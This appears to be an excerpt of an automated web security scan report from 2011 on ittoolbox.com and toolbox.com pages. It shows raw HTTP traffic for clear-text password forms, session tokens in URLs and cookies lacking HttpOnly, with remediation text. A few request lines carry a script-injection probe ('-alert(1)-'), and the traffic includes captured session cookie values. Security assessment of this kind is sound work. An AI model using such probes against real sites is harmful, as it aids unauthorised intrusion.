HTTP/1.1 200 OK Cache-Control: private Content-Length: 72604 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=fxf05445egzyff3bwiyjik3x; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:10 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://networking.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: networking.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 91759 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=5kuwlnb05jml5f45ib34n555; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:14 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://oracle.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: oracle.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 78126 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=dnzjqj45bhnnumaespuasb45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:21 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://peoplesoft.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: peoplesoft.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70995 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=fjxtzvek1n24rc3qv05z1gbj; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:21 GMT Connection: close
GET / HTTP/1.1 Host: projectmanagement.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70396 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=x1kl5s4525t13p45bqmqziut; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:22 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://sap.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: sap.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 83566 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=uelcsg55rouamz55yuh1o455; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:36 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://security.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: security.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 81934 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=mruc2m45webcko55sgy2f5jm; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:33 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://siebel.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: siebel.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72499 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=yvvy0cefbpzquq2it2cgzprn; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:39 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://storage.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: storage.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71718 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=qoshvh55jsp2ig55kw2vi245; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:41 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://supplychain.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: supplychain.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 74807 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=rqqjl3aklble05amudmoqvyc; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:42 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://telephony.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: telephony.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 62475 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3eypwe552rukfx2gthccur2v; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:49 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://unix.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: unix.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 80502 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ciicu055vtcjje45vlgvahbj; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:56 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://visualbasic.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: visualbasic.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63969 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=pr5xja553zbb0s45ijt4gx45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:55 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://webdesign.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: webdesign.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79392 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=e3e0aj55kknpbv2uorfonxy4; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:55 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://windows.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: windows.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 77587 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=nseiegiwhp2img3lqow10z3v; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Windows Com ...[SNIP]... </div> <form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm"> <div> ...[SNIP]... <div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="<% =btnSignIn.ClientID %>" /></div> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://wireless.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: wireless.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73493 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ssd5o2akjvnbi055fht5lga2; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:00 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.ebizq.net/goldclub/login.php
The form contains the following password field:
password
Request
GET /blogs/saasweek/ HTTP/1.1 Host: www.ebizq.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:56:55 GMT Server: Apache/2.0.46 (Red Hat) Accept-Ranges: bytes X-Powered-By: PHP/4.3.2 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56022
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.toolbox.com/Feedback.aspx
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /Feedback.aspx HTTP/1.1
Host: www.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=x4f3gn55elbncwac4bzxhvnv; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:46 GMT
Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.toolbox.com/PrivacyPolicy.aspx
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /PrivacyPolicy.aspx HTTP/1.1
Host: www.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35183
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ooszoo554q0sbqbgcenmvfuw; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:42 GMT
Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.toolbox.com/TermsofUse.aspx
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /TermsofUse.aspx HTTP/1.1
Host: www.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46350
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3xmjev553fihez45e2oo2ivi; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:42 GMT
Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.toolbox.com/about/Default.aspx
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /about/ HTTP/1.1
Host: www.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22640
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=orhdbf455xhzzen32ok4mn2c; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:40 GMT
Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.toolbox.com/careers/Default.aspx
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /careers/ HTTP/1.1
Host: www.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19781
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=w25wtxbkl34gxdreyk40jymn; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:43 GMT
Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.toolbox.com/contact/
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /contact/ HTTP/1.1
Host: www.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25997
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=icbksg45hpzrcf55h0vo2x45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:45 GMT
Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.toolbox.com/it/advertising/
The form contains the following password field:
ctl00$ctl00$m$txtSignin_Password
Request
GET /it/advertising/ HTTP/1.1
Host: www.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26971
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:45 GMT
Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.toolbox.com/news/Default.aspx
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /news/ HTTP/1.1
Host: www.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21896
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ugckar45ukzeih55dzbcsf45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:43 GMT
Connection: close
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
Request
GET /m2/infotechtoolbox/mbox/standard?mboxHost=it.toolbox.com&mboxSession=1296053537181-721966&mboxPage=1296053537181-721966&screenHeight=1200&screenWidth=1920&browserWidth=1155&browserHeight=1012&browserTimeOffset=-360&colorDepth=16&mboxCount=1&mbox=blogs_cta_start_a_blog&mboxId=0&mboxTime=1296031938515&mboxURL=http%3A%2F%2Fit.toolbox.com%2Fblogs%2Fppmtoday%2Fventure-and-gender-43847%3Fee209'-alert(1)-'185afe72fe1%3D1&mboxReferrer=http%3A%2F%2Fburp%2Fshow%2F4&mboxVersion=39 HTTP/1.1
Host: infotechtoolbox.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://it.toolbox.com/blogs/ppmtoday/venture-and-gender-43847?ee209'-alert(1)-'185afe72fe1=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 177
Date: Wed, 26 Jan 2011 14:51:58 GMT
Server: Test & Target
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /white-paper/ HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 26 Jan 2011 14:55:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=6de0a61392ea135c6980b8417bddae51; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24296
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]...
guest_id=129605378903672234; path=/; expires=Fri, 25 Feb 2011 14:56:29 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /toolboxdotcom HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Date: Wed, 26 Jan 2011 14:56:29 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296053789-52552-6574
ETag: "cba3bfc96bf68c050adb0ae164dc8175"
Last-Modified: Wed, 26 Jan 2011 14:56:29 GMT
X-Runtime: 0.01600
Content-Type: text/html; charset=utf-8
Content-Length: 51936
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296053788039947; path=/; expires=Wed, 02-Feb-11 14:56:28 GMT; domain=.twitter.com
Set-Cookie: guest_id=129605378903672234; path=/; expires=Fri, 25 Feb 2011 14:56:29 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWY4MmYzNTRlZWE2MzBkYjZlMzAxMGM2YmExZmIzMTAwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIbmHTwi0B--5f068f484769ee483f9eaf437005d73e90b46f16; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
guest_id=129605378737979704; path=/; expires=Fri, 25 Feb 2011 14:56:27 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /toolboxforit HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Date: Wed, 26 Jan 2011 14:56:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296053787-90115-59528
ETag: "88e9aa64188f9d64f88986da2628b13f"
Last-Modified: Wed, 26 Jan 2011 14:56:27 GMT
X-Runtime: 0.01067
Content-Type: text/html; charset=utf-8
Content-Length: 45652
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296053787142478; path=/; expires=Wed, 02-Feb-11 14:56:27 GMT; domain=.twitter.com
Set-Cookie: guest_id=129605378737979704; path=/; expires=Fri, 25 Feb 2011 14:56:27 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTljM2MwNTc3NjdjNTdhMzAyZDA4OTRlY2U5NzliMjM0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI9VrTwi0B--bba18e9789744f8014c5ff57c43fcea71113a57e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ads/apiresults.js HTTP/1.1
Host: www.indeed.com
Proxy-Connection: keep-alive
Referer: http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067?28cff'-alert(1)-'27a3eb6d893=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /directory/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 52564
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=el0hjp55tk5oie55qdseux55; path=/; HttpOnly
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.ittoolbox.com; expires=Tue, 26-Apr-2011 13:49:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:34 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fit.toolbox.com%2fblogs%2fppmtoday%2fventure-and-gender-43847 HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lf8gij0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt1181qqxzt1181qqxzt1181qqxzt1181qq; vstcnt=3lebnns021l034e2061201181qq4fhux122q000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru0000000000000004esx7120104tej0r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv1a96l00i0p01050410h; orblb=2lfk1rn012dh10u0100000; rdrlst=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; sglst=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
Response
HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv1b9mx00j0q01050510i; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/
Set-Cookie: orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/
Set-Cookie: rdrlst=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; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/
